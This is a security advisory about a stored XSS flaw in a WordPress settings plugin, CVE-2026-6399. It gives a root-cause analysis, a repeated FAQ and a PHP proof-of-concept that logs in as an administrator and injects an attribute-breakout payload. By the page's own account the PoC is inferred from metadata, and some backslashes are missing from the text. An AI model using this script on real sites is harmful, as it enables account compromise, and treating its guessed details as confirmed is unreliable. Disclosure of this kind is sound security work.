What is CVE-2026-6399?

CVE-2026-6399 is a stored cross-site scripting (XSS) vulnerability in the General Options plugin for WordPress, affecting versions up to and including 1.1.0. It allows authenticated users with Administrator-level access to inject arbitrary JavaScript via the ‘ad_contact_number’ parameter.

How does the vulnerability work?

The vulnerability arises from improper output escaping of the ‘ad_contact_number’ field. The sanitize_text_field() function is used for output, which does not encode double-quote characters. This allows an attacker to break out of an HTML attribute context and execute scripts when the settings page is viewed.

Who is affected by this vulnerability?

WordPress sites using the General Options plugin version 1.1.0 or earlier are affected. Specifically, authenticated users with Administrator-level access can exploit this vulnerability, making it critical for site administrators to assess their user roles and plugin versions.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if the General Options plugin is installed and its version. If it is version 1.1.0 or earlier, your site is susceptible to CVE-2026-6399. Additionally, review the settings for the ‘ad_contact_number’ field for any injected scripts.

What is the CVSS score for this vulnerability?

CVE-2026-6399 has a CVSS score of 4.4, indicating a medium severity level. This score reflects the high privileges required for exploitation, but also the potential impact of executing scripts in the admin context.

What are the practical risks of this vulnerability?

The primary risk is that an attacker could inject and execute malicious JavaScript when an administrator visits the settings page. This could lead to session hijacking, unauthorized actions performed on behalf of the administrator, or further compromise of the site.

How can I mitigate or fix this vulnerability?

To mitigate this vulnerability, it is recommended to disable the General Options plugin or remove the vulnerable ‘ad_contact_number’ field. Additionally, if a patch becomes available, it should replace the use of sanitize_text_field() with esc_attr() for proper output escaping.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can authenticate as an administrator and inject a payload into the ‘ad_contact_number’ field. It shows that the payload can break out of the HTML attribute context, leading to script execution when the settings page is accessed.

Is there a patched version available?

As of now, there is no patched version of the General Options plugin that addresses CVE-2026-6399. Site administrators should monitor for updates from the plugin developer and take immediate action to disable or remove the plugin.

What is the CWE classification for this vulnerability?

CVE-2026-6399 is classified under CWE-79, which refers to improper neutralization of input during web page generation (‘Cross-site Scripting’). This classification highlights the underlying issue of inadequate output escaping in the plugin.

What should I do if I suspect my site has been exploited?

If you suspect your site has been exploited, immediately review the logs for unauthorized access and changes. Change all administrator passwords, remove any suspicious scripts, and consider restoring from a clean backup. Conduct a thorough security audit to identify and remediate any further vulnerabilities.

How can I stay informed about vulnerabilities like CVE-2026-6399?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow security blogs, and monitor the CVE database. Regularly check for updates to your plugins and WordPress core, and consider using security plugins that provide vulnerability scanning.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 20, 2026

CVE-2026-6399: General Options <= 1.1.0 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'ad_contact_number' Parameter (general-options)

CVE ID CVE-2026-6399

Plugin general-options

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 1.1.0

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6399 (metadata-based): This vulnerability in General Options <= 1.1.0 allows authenticated attackers with Administrator-level access to execute stored cross-site scripting via the 'ad_contact_number' parameter. The CVSS score is 4.4 (medium), reflecting the high privileges required but the potential for script execution in the admin context.

The root cause is improper output escaping of the 'ad_contact_number' field. The plugin uses sanitize_text_field() on input, which strips HTML tags but does not encode double-quote characters to ". When the stored value is echoed inside a double-quoted HTML attribute (value="…"), an attacker-supplied double-quote breaks out of the attribute context. WordPress's wp_magic_quotes mechanism adds a backslash before quotes (creating "), but HTML parsers treat this as a literal backslash followed by a closing quote, not an escaped quote. This is inferred from the CWE-79 classification and the detailed description; no code diff confirms this, but the pattern matches known WordPress plugin XSS vulnerabilities.

Exploitation requires Administrator-level access to a WordPress site. The attacker navigates to the General Options settings page (likely at /wp-admin/options-general.php?page=general-options or similar). They inject a payload into the 'ad_contact_number' field, such as: " onclick=alert(1) x=". The sanitize_text_field() function strips any HTML tags but passes the double-quote. WordPress's magic quotes convert " to ", but the backslash is rendered literally, and the quote breaks out of the attribute. When any Administrator visits the settings page, the stored value is output in an HTML attribute (e.g., value="…"), causing the injected JavaScript to execute. The attack vector is a crafted POST request to the plugin's settings update endpoint, likely via the WordPress admin interface or directly to an AJAX handler.

Remediation requires proper output escaping when echoing the value inside an HTML attribute. The fix should use esc_attr() instead of sanitize_text_field() for output context. esc_attr() encodes double-quote characters to ", preventing attribute breakout. Since the description indicates sanitize_text_field() is used for output escaping, the developer likely confused sanitization with escaping. The patch should replace the output function with the appropriate escaping function for the attribute context. No patched version is available, so site administrators should disable the plugin or remove the vulnerable field entirely.

If exploited, this vulnerability allows an attacker to inject arbitrary JavaScript in the WordPress admin context. Since it requires Administrator-level access, the primary impact is cross-site scripting in the admin panel. An attacker could execute scripts when other Administrators visit the settings page, potentially stealing session cookies, performing administrative actions on behalf of the victim, or injecting malicious content. The CVSS vector limits impact to low confidentiality and low integrity due to the admin-only scope and high privileges required. However, in a multi-administrator environment, a compromised administrator account could use this to target other administrators, potentially leading to further compromise.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6399 - General Options <= 1.1.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'ad_contact_number' Parameter

// Configuration: Set the target WordPress site URL and admin credentials
$target_url = 'http://example.com';  // Change this to the target WordPress site URL
$admin_username = 'admin';           // Administrator username
$admin_password = 'password';        // Administrator password

// The vulnerable parameter name
$param_name = 'ad_contact_number';

// Payload: double-quote to break out of the HTML attribute context and inject JavaScript
// sanitize_text_field() strips HTML tags, so we cannot use <script> tags.
// Instead, we use a double-quote to close the attribute, then add an event handler.
$payload = '" onclick=alert(document.domain) x=';

echo "[+] CVE-2026-6399 Proof of Conceptn";
echo "[+] Target: $target_urlnn";

// Step 1: Authenticate as administrator
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $admin_username,
    'pwd' => $admin_password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve-2026-6399-cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code !== 200) {
    die("[-] Failed to authenticate. HTTP code: $http_coden");
}
echo "[+] Authenticated successfully as $admin_usernamen";

// Step 2: Detect the plugin settings page URL
// The plugin likely registers a menu page under Settings or Options.
// Common patterns: /wp-admin/admin.php?page=general-options or /wp-admin/options-general.php?page=general-options
$settings_url_attempts = array(
    $target_url . '/wp-admin/admin.php?page=general-options',
    $target_url . '/wp-admin/options-general.php?page=general-options',
    $target_url . '/wp-admin/admin.php?page=general_options'
);

$settings_page_url = null;
foreach ($settings_url_attempts as $url) {
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, false);
    curl_setopt($ch, CURLOPT_HTTPGET, true);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($http_code === 200 && strpos($response, 'general-options') !== false) {
        $settings_page_url = $url;
        break;
    }
}

if ($settings_page_url === null) {
    // If automatic detection fails, assume a common default
    $settings_page_url = $target_url . '/wp-admin/options-general.php?page=general-options';
    echo "[!] Could not detect settings page; assuming $settings_page_urln";
} else {
    echo "[+] Detected settings page: $settings_page_urln";
}

// Step 3: Submit the payload to the vulnerable field
// The plugin likely uses a form POST to its own admin page.
// We need to determine the exact action URL and nonce.
// For this PoC, we attempt to POST directly to the settings page with the payload.
// The plugin may handle saving via admin-post.php or direct POST to the settings page.

// Attempt 1: Direct POST to the settings page (common for simple plugins)
curl_setopt($ch, CURLOPT_URL, $settings_page_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    $param_name => $payload,
    'option_page' => 'general-options',
    'action' => 'update',
    '_wpnonce' => ''  // Nonce may be required; we attempt without first
)));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve-2026-6399-cookies.txt');
$response = curl_exec($ch);

// Check if the payload was stored by visiting a page that outputs it.
// The vulnerable output likely appears on the same settings page.
// We re-fetch the settings page and verify the payload is reflected.
curl_setopt($ch, CURLOPT_URL, $settings_page_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

if (strpos($response, $payload) !== false) {
    echo "[+] Exploit successful! Payload injected.n";
    echo "[+] Payload: $payloadn";
    echo "[+] Visit $settings_page_url as an administrator to trigger XSS.n";
} else {
    echo "[-] Exploit may have failed. The payload was not reflected in the response.n";
    echo "[!] This may be due to nonce validation or incorrect request format.n";
    echo "[!] Try using the WordPress admin interface directly with the payload as the ad_contact_number value.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-6399?
Overview of the vulnerability
CVE-2026-6399 is a stored cross-site scripting (XSS) vulnerability in the General Options plugin for WordPress, affecting versions up to and including 1.1.0. It allows authenticated users with Administrator-level access to inject arbitrary JavaScript via the ‘ad_contact_number’ parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from improper output escaping of the ‘ad_contact_number’ field. The sanitize_text_field() function is used for output, which does not encode double-quote characters. This allows an attacker to break out of an HTML attribute context and execute scripts when the settings page is viewed.
Who is affected by this vulnerability?
Identifying affected users
WordPress sites using the General Options plugin version 1.1.0 or earlier are affected. Specifically, authenticated users with Administrator-level access can exploit this vulnerability, making it critical for site administrators to assess their user roles and plugin versions.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify if the General Options plugin is installed and its version. If it is version 1.1.0 or earlier, your site is susceptible to CVE-2026-6399. Additionally, review the settings for the ‘ad_contact_number’ field for any injected scripts.
What is the CVSS score for this vulnerability?
Understanding the severity rating
CVE-2026-6399 has a CVSS score of 4.4, indicating a medium severity level. This score reflects the high privileges required for exploitation, but also the potential impact of executing scripts in the admin context.
What are the practical risks of this vulnerability?
Impact on site security
The primary risk is that an attacker could inject and execute malicious JavaScript when an administrator visits the settings page. This could lead to session hijacking, unauthorized actions performed on behalf of the administrator, or further compromise of the site.
How can I mitigate or fix this vulnerability?
Recommended actions
To mitigate this vulnerability, it is recommended to disable the General Options plugin or remove the vulnerable ‘ad_contact_number’ field. Additionally, if a patch becomes available, it should replace the use of sanitize_text_field() with esc_attr() for proper output escaping.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can authenticate as an administrator and inject a payload into the ‘ad_contact_number’ field. It shows that the payload can break out of the HTML attribute context, leading to script execution when the settings page is accessed.
Is there a patched version available?
Current status of the plugin
As of now, there is no patched version of the General Options plugin that addresses CVE-2026-6399. Site administrators should monitor for updates from the plugin developer and take immediate action to disable or remove the plugin.
What is the CWE classification for this vulnerability?
Understanding the coding issue
CVE-2026-6399 is classified under CWE-79, which refers to improper neutralization of input during web page generation (‘Cross-site Scripting’). This classification highlights the underlying issue of inadequate output escaping in the plugin.
What should I do if I suspect my site has been exploited?
Response to potential exploitation
If you suspect your site has been exploited, immediately review the logs for unauthorized access and changes. Change all administrator passwords, remove any suspicious scripts, and consider restoring from a clean backup. Conduct a thorough security audit to identify and remediate any further vulnerabilities.
How can I stay informed about vulnerabilities like CVE-2026-6399?
Keeping up with security updates
To stay informed about vulnerabilities, subscribe to security mailing lists, follow security blogs, and monitor the CVE database. Regularly check for updates to your plugins and WordPress core, and consider using security plugins that provide vulnerability scanning.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations